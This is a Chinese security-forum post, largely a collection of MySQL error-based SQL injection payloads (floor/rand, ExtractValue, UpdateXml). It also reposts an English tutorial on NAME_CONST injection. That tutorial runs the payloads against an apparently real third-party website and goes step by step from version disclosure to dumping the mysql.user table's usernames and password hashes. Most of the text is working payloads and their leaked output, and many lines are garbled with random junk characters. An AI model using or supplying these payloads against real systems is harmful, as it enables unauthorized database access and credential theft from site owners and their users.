找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3178|回复: 0
打印 上一主题 下一主题

mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法

[复制链接]
跳转到指定楼层
楼主
发表于 2015-11-11 19:03:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

1、通过floor报错

可以通过如下一些利用代码

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

举例如下:- g' V6 K. v# G7 w1 d( {
首先进行正常查询:

mysql> select * from article where id = 1;
4 _& Y: r6 g( F, h+—-+——-+———+/ z; Z  E) M' u, S' s# l5 B% R$ k) ~+ i
| id | title | content |3 i4 D' ^+ }4 E' j4 X( q
+—-+——-+———+4 e1 o# `3 m$ B5 Q* y2 D0 Y
|  1 | test  | do it   |
* p1 v9 `4 [  ?+—-+——-+———+

假如id输入存在注入的话,可以通过如下语句进行报错。

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);
" d1 K% [5 r2 c0 t( i( V6 HERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’

可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。, d5 w" P- e1 b! i+ f+ W
例如我们需要查询管理员用户名和密码:

Method1:

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat((select pass from admin where id  =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
5 `4 G/ q2 I0 j- i: Z  U8 X. g. rERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

Method2:

mysql> select * from article where id = 1 and (select count(*)  from (select 1 union   select null union   select !1)x group by  concat((select pass from admin limit 1),floor(rand(0)*2)));
1 o: ]9 ~# J7 N2 HERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

2、ExtractValue- N; P8 K* ]4 b5 K% A3 h
测试语句如下

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

实际测试过程

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
$ f  K* ], h0 h, E: [' EERROR 1105 (HY000): XPATH syntax error: ’\admin888′

3、UpdateXml

测试语句

and 1=(updatexml(1,concat(0x3a,(select user())),1))

实际测试过程

mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’

! t: E' n: h% k* i( b5 E
1 B1 b& T# X7 b2 v# T$ z8 s9 [( R' }

再收集:


0 W& |  Z1 t! y, [& bhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) 3 k" n* G$ j( t" ^1 O0 o

) m' S$ B4 T. U- B" P$ mErroruplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’% s* r! B7 ?0 e' d+ U7 }% e: K/ S
4 r: Z% v; I6 ]" I2 e
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)) |8 }7 _4 \% X; y* O" o6 K0 F
  g7 d& ~- p7 I  r1 B! D1 s
Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′ ) T/ p* G* t5 g
! r& Z4 a4 J( }
MYSQL高版本报错注入技巧-利用NAME_CONST注入
) M- F8 k+ B- J7 {% ?: S! f: AIt's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it. / P$ k- K. V6 g8 U' m8 x6 v2 u# [

1 R- m( j; X2 Q; F) }
0 G1 T4 y, X) @7 C3 ^相关信息* C9 @8 k4 k. m: A$ e
  D5 d( f! m4 U
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.& h6 v8 E8 k  Y% e, h$ q" G3 \
+ g1 u. o( j. s$ S. M
Code:8 x' q1 C. x2 V8 `: \# b
NAME_CONST(DATA, VALUE)! r7 V* l$ k9 e& J: r" I

( x8 X$ f/ e- h+ w, U9 ~Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants." Q1 X* G9 m: B9 n. g7 n" ?

/ }3 W% W; ]* D5 p6 Y0 q6 pSELECT NAME_CONST('TEST', 1)
8 V, O& y7 E: V4 W& B) G
2 _9 R2 X/ g  V, j1 L4 W% N. w
; h: g" [1 y0 N/ B3 v6 Z& U
8 [/ ?, O  y+ a: E' S& D& q|---------------|
# T- o: J+ h- h|     TEST      |
# ~$ N% c8 }: L! ]) _% Q|               |( M8 R0 [& i* c- ?3 C! ~1 d- P
|---------------|" E  z' g+ c: e" ]. G4 _4 \! f
|       1       |
! e/ _* \0 n& s$ P1 I& A7 r|               |
5 T. D. Q$ L6 y4 [% M/ ||---------------|
: V3 ?5 x+ u& o' O# P: O
$ @1 n4 ?6 f: r

" L. s' q4 D7 x# Q1 W& [8 Y( I& p1 F  x% v% i
3 w" J# f& A% v. w0 q: x5 K
http://dev.mysql.com/doc/refman/5.0/en/m...name-const7 L  p+ U$ G" e* ]3 V7 B  a
Intro to MySQL Variables
. L9 {2 b9 r- I5 r/ }2 b! n4 t  |6 P2 K- m7 I
Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.9 u  f4 [7 v3 Q' ]
0 T1 i; {& H7 H9 y" i
Code:
3 {, G. \! h7 w# @( X9 Ohttp://www.baido.hk/qcwh/content ... ;sid=19&cid=261
# M& u! g8 y2 u( a8 d
( Q0 d) N; u& P/ B

3 ?, ^3 e0 o1 L" W. h3 b, B: W, g) c
, O$ H" F: r  B+ C
% P- q& c( k: v$ `. K. k4 `# A
Code:
6 }; Q; T6 L* ?( [1 e: Q8 Wand+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
# V& w& Q6 [8 f+ `* W( C; y' c3 G+ [

6 q  B  w. o. E  Q1 s
, d/ O" |$ ]- rVAR = Your MySQL variable.
( m* A( F2 R7 K9 T0 j/ q# `6 |% z' i$ f  g' }( P
MySQL 5.1.3 Server System Variables
, `( Z! q  W$ o! J' T% s4 ~! X) R6 r% x$ _; v  }% K9 W0 T
Let's try it out on my site..
9 {; q3 @% a: x! o  g
5 e3 L4 o# e( o) j% V; OCode:
, C2 b: k( j, N0 N, ihttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--3 t- S' {: h3 C

3 l8 x. Q" \" ~" Q1 j4 uErroruplicate column name '5.0.27-community-nt'
  @  J& I* h% k2 ?1 y
& [8 l* m" c4 D- R- n- F

5 H3 W. A5 D, {9 D( y" k6 D3 K0 X5 O5 m: i& o2 I: [* z
7 K/ d# L$ y# s2 [
  W5 g$ }9 J- n4 u1 D
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
' m$ T7 j3 s$ @# t1 U5 F
* h/ k1 C; A% w7 uData Extraction
2 _# M( w# ^( s( Q' h! E! z3 o4 L
* c6 |& ?0 b  n* L' F  {5 V7 TCode:. h% m5 U% t$ g% w, C
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--$ a) s3 l$ M: m  Y: F
, J3 `/ P  _7 u. ]
: I3 u9 z3 ?6 d; z) f. K- k& q8 x
We should get a duplicate column 1 error..." o+ Q7 g- C, c% r
" G, _( g) z! [" e: X5 {+ w. t: M6 I
Code:) s( e/ b' o4 e- h1 V; Y+ {5 `+ h. I
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--- P" G/ h5 k) ?

3 S2 M0 O6 C* sErroruplicate column name '1: }# ~1 _9 o6 n& X3 N* d
3 Z* y3 `6 G, H& W: @
* t& W! U4 Y0 ]% D

" E& N2 A- W  H( a) q
$ t1 a! A6 e5 @
/ H+ b5 I( V& A5 u9 H1 y

  q; [, H: r% n# {: p  qNow let's get the tables out this bitch..
  w* G. Q, H: A. |6 O: o% N
( y3 K# K* f5 PCode:0 N5 F8 C' z% C$ z7 K8 \2 p6 y& [: c; \
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--3 K. H' s6 G$ h; \+ c8 i# ^! ~

; D0 g+ j6 v' o) M; t- ?7 S1 ?0 g+ W# s3 \* V# b; B
Let's see if it works here, if it does, we can go on and finish the job.
) h: [" P; |. F/ o
1 ?6 q2 J3 L& y% `7 qCode:) d+ }3 [4 Z6 b2 K1 w
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
! T/ P* J& x2 ^% Q; j1 N& |: @# H1 D; p# D

  D/ w8 N2 b* G2 ~8 @2 lErroruplicate column name 'com_admanage
- N+ G6 [5 d0 ^5 f& Y. }( M
1 ?8 A3 _4 c1 o

. h* Y! w! I2 d$ o# K* W0 W+ R* t2 X) V0 ^
1 l$ `, E3 \* P7 X' N3 L
- F. P) e8 x; d+ i; @, ~, J7 ]' h
: S+ f# e- X: Y  Z$ k1 m& e
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
  d7 ^3 H$ D3 f  f% @1 \
& @7 n' D; ~6 L' zLet's get the columns out of the user table..& h' O- u+ o1 q; G6 H6 ]

$ T# V3 i, P5 M3 X; bCode:: E* O  e+ Z( G& g! C; F, O
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--4 x( n% l, o, h# O" b3 x& T4 A+ B

, Z1 X, S& E/ G; A! }/ T" X
/ ^7 w+ f% J$ l2 H6 m: e  S; ASo mine looks like this, and I get the duplicate column name 'Host'.- Y7 V: D. X1 |6 h3 I' l- X
% d8 q% N7 P/ {0 h' Q1 d
Code:
1 e# `- c: }$ Z& n" |& W( _: Fhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--# }+ a# }7 u, L; s% |, z

- _" J  q8 `. W% t2 DErroruplicate column name 'Host'
3 E$ M6 y( \& X* h9 D: d

- v: o9 C6 g9 g4 x* p1 U; r' w. i
  A9 p; L) |5 F0 X, D5 d7 U
$ o* \; d8 H  Y4 D
: Q. N1 r4 |4 T% _
+ \  k" n3 s% z# a$ {

& p' h( F* U( J& ]* Z$ DWoot, time to finish this bitch off.
2 r/ T1 V1 i7 P# P$ {$ V' H% L& W
( a8 n; P9 D. ?. Z0 y' w, _Code:/ d1 o+ ]2 A4 R* W) C& M* I
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
# B) I3 |4 d: v- @8 ]% N/ ]

7 Y2 m( j3 g7 N6 V
$ ?, @9 q) t% {So mine looks like this...
* l6 v, C8 U$ z" i' T
& O! O$ ~. f) J5 xCode:
7 ^2 x5 f2 z* h/ m; v5 qhttp://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
" f$ i  \, f9 d/ }8 ~# W1 u8 n7 G( G& i4 ^  h# y
Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82': t1 N$ D7 ?9 ?& v: N: s8 S2 k3 r; E

4 I) x: N# g4 b6 X. D+ p- m3 Z$ ~5 u
/ L  @7 Q- @9 f4 o4 U" y

) N" ]0 x' B4 a) r+ N$ T8 I

- h- R" b+ y5 J( b. M
0 c$ U; a2 w9 [" k; ^2 a% `And there we have it, thanks for reading.
- U5 j/ T! a6 Y: J- j9 W% e
' [. t+ j, x7 B
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表